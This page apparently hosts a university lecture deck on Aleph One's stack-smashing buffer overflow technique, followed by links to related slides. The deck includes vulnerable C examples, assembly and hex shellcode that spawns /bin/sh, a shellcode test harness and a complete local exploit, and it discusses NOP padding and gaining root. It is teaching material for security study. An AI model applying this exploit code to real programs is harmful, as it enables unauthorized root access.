smashing the stack
play

Smashing the Stack Based on the paper by Aleph One Slides by Prof - PowerPoint PPT Presentation

Nov 21, 2022 •187 likes •660 views

Smashing the Stack Based on the paper by Aleph One Slides by Prof Yan Chen, Northwestern University Smashing the Stack for Fun and Profit Review: Process memory organization The problem: Buffer overflows How to exploit the problem

  1. Smashing the Stack Based on the paper by Aleph One Slides by Prof Yan Chen, Northwestern University

  2. Smashing the Stack for Fun and Profit • Review: Process memory organization • The problem: Buffer overflows • How to exploit the problem • Implementing the Exploit • Results • Conclusion and discussion

  3. Process Memory Organization

  4. Process Memory Organization

  5. Process Memory Organization

  6. Function Calls

  7. Function Calls

  8. Buffer Overflows void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function (large_string); }

  9. Buffer Overflows

  10. Buffer Overflows

  11. Buffer Overflows

  12. Buffer Overflows

  13. Buffer Overflows

  14. Buffer Overflows

  15. Buffer Overflows

  16. Buffer Overflows

  17. Modifying the Execution Flow void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); }

  18. Modifying the Execution Flow

  19. Modifying the Execution Flow

  20. Modifying the Execution Flow

  21. Modifying the Execution Flow

  22. Exploiting Overflows- Smashing the Stack • Now we can modify the flow of execution- what do we want to do now? • Spawn a shell and issue commands from it

  23. Exploiting Overflows- Smashing the Stack • Now we can modify the flow of execution- what do we want to do now? • Spawn a shell and issue commands from it

  24. Exploiting Overflows- Smashing the Stack • What if there is no code to spawn a shell in the program we are exploiting? • Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

  25. Exploiting Overflows- Smashing the Stack • What if there is no code to spawn a shell in the program we are exploiting? • Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

  26. Implementing the Exploit • Writing and testing the code to spawn a shell • Putting it all together- an example of smashing the stack • Exploiting a real target program

  27. Spawning a Shell #include <stdio.h> #include <stdlib.h> void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); }

  28. Spawning a Shell void main() {__asm__(" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2f .string \"/bin/sh\" "); }

  29. Spawning a Shell char shellcode[] = "\xeb\x2a\x5e \x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd \x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd \x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec \x5d\xc3";

  30. Testing the Shellcode char shellcode[ ] = "\xeb\x2a\x5e…/bin/ sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }

  31. Testing the Shellcode

  32. Testing the Shellcode

  33. Putting it all Together char shellcode[]="\xeb\x1f\…. \xb0\x0b\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy (buffer,large_string); }

  34. Putting it all Together

  35. Putting it all Together

  36. Putting it all Together

  37. Putting it all Together

  38. Putting it all Together

  39. Putting it all Together

  40. Exploiting a Real Program • It’s easy to execute our attack when we have the source code • What about when we don’t? How will we know what our return address should be?

  41. How to find Shellcode 1. Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction

  42. How to find Shellcode 2. Pad shellcode with NOP’s then guess - we don’t need to be exactly on - much more efficient

  43. Summary • ‘Smashing the stack’ works by injecting code into a program using a buffer overflow, and getting the program to jump to that code • By exploiting a root program, user can call exec(“/bin/shell”) and gain root access

  44. Summary • Buffer overflow vulnerabilities are the most commonly exploited- account for more than half of all new security problems (CERT) • Are relatively easy to exploit • Many variations on stack smash- heap overflows, internet attacks, etc.

  45. Small Buffer Overflows • If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our code • Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory • Can make environment variable as large as you want • Only works if you have access to environment variables

  46. Results: Hacking xterm Attempts • Without NOP padding - • With NOP padding 10 • Using environment variable 1

Recommend

Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for

Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for

Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit by Aleph One Summer 2017 Roadmap 1 Process Memory Organization Text Fixed by program Includes code and read-only data

257 views • 22 slides
Smashing the Stack Protector for Fun and Profit 1 1996: Smashing The Stack for Fun and Profit

Smashing the Stack Protector for Fun and Profit 1 1996: Smashing The Stack for Fun and Profit

Smashing the Stack Protector for Fun and Profit 1 1996: Smashing The Stack for Fun and Profit ... overflow direction / higher addresses int main(int argc, char **argv) buf { stack growth char buf[0x10]; gets(buf); saved return address

911 views • 13 slides
64-bit Linux stack smashing tutorial: Part 2 Written on April 21, 2015 This is part 2 of my

64-bit Linux stack smashing tutorial: Part 2 Written on April 21, 2015 This is part 2 of my

Techorganic About PGP Disclaimer Vulnerabilities Musings from the brainpan 64-bit Linux stack smashing tutorial: Part 2 Written on April 21, 2015 This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64- bit

451 views • 9 slides
p2 Jeff Chase Duke University vulnerable.c Smashing the Stack for Fun and Profit 0x7fffffff

p2 Jeff Chase Duke University vulnerable.c Smashing the Stack for Fun and Profit 0x7fffffff

p2 Jeff Chase Duke University vulnerable.c Smashing the Stack for Fun and Profit 0x7fffffff VAS example (32-bit) Reserved The program uses virtual memory through Stack its process Virtual Address Space: An addressable array

459 views • 22 slides
References Smashing the stack for fun and profit http://phrack.org/issues/49/14.html

References Smashing the stack for fun and profit http://phrack.org/issues/49/14.html

References Smashing the stack for fun and profit http://phrack.org/issues/49/14.html Exploiting format string vulnerabilities https://crypto.stanford.edu/cs155/papers/for matstring-1.2.pdf Once upon a free()

427 views • 19 slides
Binarylevel program analysis: Stack Smashing Gang Tan CSE 597 Spring 2019 Penn State

Binarylevel program analysis: Stack Smashing Gang Tan CSE 597 Spring 2019 Penn State

Binarylevel program analysis: Stack Smashing Gang Tan CSE 597 Spring 2019 Penn State University 1 Program Stack For implementing procedure calls and returns Keep track of program execution and state by storing local variables

257 views • 23 slides
Stack Smashing as of Today A State-of-the-Art Overview on Buffer Overflow Protections on

Stack Smashing as of Today A State-of-the-Art Overview on Buffer Overflow Protections on

\x90\x90\x90\x90\x90\x90\x90\x90 Stack Smashing as of Today A State-of-the-Art Overview on Buffer Overflow Protections on linux_x86_64 &lt;fritsch+blackhat@in.tum.de&gt; Hagen Fritsch Technische Universitt Mnchen Black Hat Europe

928 views • 49 slides
Stack Smashing 1 logistics LEX assignment out exam in on week come with questions on Monday

Stack Smashing 1 logistics LEX assignment out exam in on week come with questions on Monday

Stack Smashing 1 logistics LEX assignment out exam in on week come with questions on Monday (review) 2 last few times encrypted code changing code polymorphic, metamorphic anti-VM/emulation anti-debugging stealth tunneling

817 views • 71 slides
Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware malware that evades analysis 2 logistics: LEX homework detect push ret pattern using fmex probably easier than TRICKY 3 upcoming exam next Wednesday

496 views • 48 slides
Exam Review 1 logistical note post-exam stack smashing assignment due two weeks after spring

Exam Review 1 logistical note post-exam stack smashing assignment due two weeks after spring

Exam Review 1 logistical note post-exam stack smashing assignment due two weeks after spring break (was one on schedule, but) likely harder than tricky will count for more 2 exam format around 20 question parts mostly multiple choice

634 views • 41 slides
Practical taint analysis for protecting buggy binaries So your exploit beats ASLR/DEP? I don't

Practical taint analysis for protecting buggy binaries So your exploit beats ASLR/DEP? I don't

Practical taint analysis for protecting buggy binaries So your exploit beats ASLR/DEP? I don't care Erik Bosman &lt;erik@minemu.org&gt; Traditional Stack Smashing buf[16] GET / HTTP/1.1 00baseretnarg1arg2 Traditional Stack Smashing buf[16]

1.29k views • 100 slides
Software Security Smashing the Stack: Real-World Examples Jan Nordholz Prof. Jean-Pierre Seifert

Software Security Smashing the Stack: Real-World Examples Jan Nordholz Prof. Jean-Pierre Seifert

Software Security Smashing the Stack: Real-World Examples Jan Nordholz Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2014 jan (sect) Software Security SoSe 2014 1 / 24 Example 1: the Morris worm (1988) first

695 views • 24 slides
Memory Exploits &amp; Defenses Presenter: Kevin Snow What is the threat? How do we defend

Memory Exploits &amp; Defenses Presenter: Kevin Snow What is the threat? How do we defend

Memory Exploits &amp; Defenses Presenter: Kevin Snow What is the threat? How do we defend ourselves? What is the threat? Stack Smashing Return-to-libc Format String Error Heap Overflow Generic Stack Frame Caller Callee Stack

1.12k views • 79 slides
ECS 153 Discussion Section April 6, 2015 1 What Well Cover Goal : To

ECS 153 Discussion Section April 6, 2015 1 What Well Cover Goal : To

ECS 153 Discussion Section April 6, 2015 1 What Well Cover Goal : To discuss buffer overflows in detail Stack-based buffer overflows Smashing the stack: execution from the stack

620 views • 37 slides
Smashing the Buffer Smashing the Buffer Miroslav tampar Miroslav tampar (mstampar@zsis.hr )

Smashing the Buffer Smashing the Buffer Miroslav tampar Miroslav tampar (mstampar@zsis.hr )

Smashing the Buffer Smashing the Buffer Miroslav tampar Miroslav tampar (mstampar@zsis.hr ) (mstampar@zsis.hr ) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.)

462 views • 35 slides
Stack and Queue Stack Overview Stack ADT Basic operations of stack Pushing, popping

Stack and Queue Stack Overview Stack ADT Basic operations of stack Pushing, popping

Stack and Queue Stack Overview Stack ADT Basic operations of stack Pushing, popping etc. Implementations of stacks using array linked list The Stack ADT A stack is a list with the restriction that insertions and

566 views • 44 slides
The Stack Eric McCreath The Stack The stack is a simple but useful data structure in computer

The Stack Eric McCreath The Stack The stack is a simple but useful data structure in computer

The Stack Eric McCreath The Stack The stack is a simple but useful data structure in computer science. The stack is an abstract data type that has two main operations. These are push which adds an element to the top of the stack and pop which

754 views • 8 slides
Stack ADT Tiziana Ligorio 1 Todays Plan Questons? Stack ADT 2 Abstract Data Types

Stack ADT Tiziana Ligorio 1 Todays Plan Questons? Stack ADT 2 Abstract Data Types

Stack ADT Tiziana Ligorio 1 Todays Plan Questons? Stack ADT 2 Abstract Data Types Bag List Stack 3 Stack 34 A data structure representing a stack of things Objects can be pushed onto the stack or popped from the stack

1.62k views • 116 slides
1 Array-based Stack (2.1.1) Algorithm pop (): if isEmpty () then A simple way of throw

1 Array-based Stack (2.1.1) Algorithm pop (): if isEmpty () then A simple way of throw

Elementary Data Structures Stacks, Queues, Vectors, Lists &amp; Sequences Trees The Stack ADT (2.1.1) The Stack ADT stores arbitrary objects Insertions and deletions Auxiliary stack follow the last-in first-out operations: scheme

473 views • 13 slides
ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF

ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF

ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF THE STACK Add, remove rock and book from the top, or else 3 Stack at logical level A stack is an ADT in which elements add added and

1.06k views • 37 slides
ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF

ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF

ADT Stack 1 Stacks of Coins and Plates 2 Stacks of Rocks and Books TOP OF THE STACK TOP OF THE STACK Add, remove rock and book from the top, or else 3 Stack at logical level A stack is an ADT in which elements add added and

679 views • 19 slides
Call Stack Stack Bottom Memory region managed with stack discipline Procedures and the Call

Call Stack Stack Bottom Memory region managed with stack discipline Procedures and the Call

Call Stack Stack Bottom Memory region managed with stack discipline Procedures and the Call Stack higher %rsp holds lowest stack address addresses (address of &quot;top&quot; element) Topics stack grows Procedures toward lower

76 views • 5 slides
Stack 7 January 2019 OSU CSE 1 Stack The Stack component family allows you to manipulate

Stack 7 January 2019 OSU CSE 1 Stack The Stack component family allows you to manipulate

Stack 7 January 2019 OSU CSE 1 Stack The Stack component family allows you to manipulate strings of entries of any (arbitrary) type in LIFO (last-in-first-out) order A kind of dual to Queue Remember, &quot;first&quot; and

450 views • 33 slides
Compilers Stack Machines Alex Aiken Stack Machines Only storage is a stack An

Compilers Stack Machines Alex Aiken Stack Machines Only storage is a stack An

Compilers Stack Machines Alex Aiken Stack Machines Only storage is a stack An instruction r = F(a 1 ,a n ): Pops n operands from the stack Computes the operation F using the operands Pushes the result r on the stack Alex

362 views • 13 slides

More recommend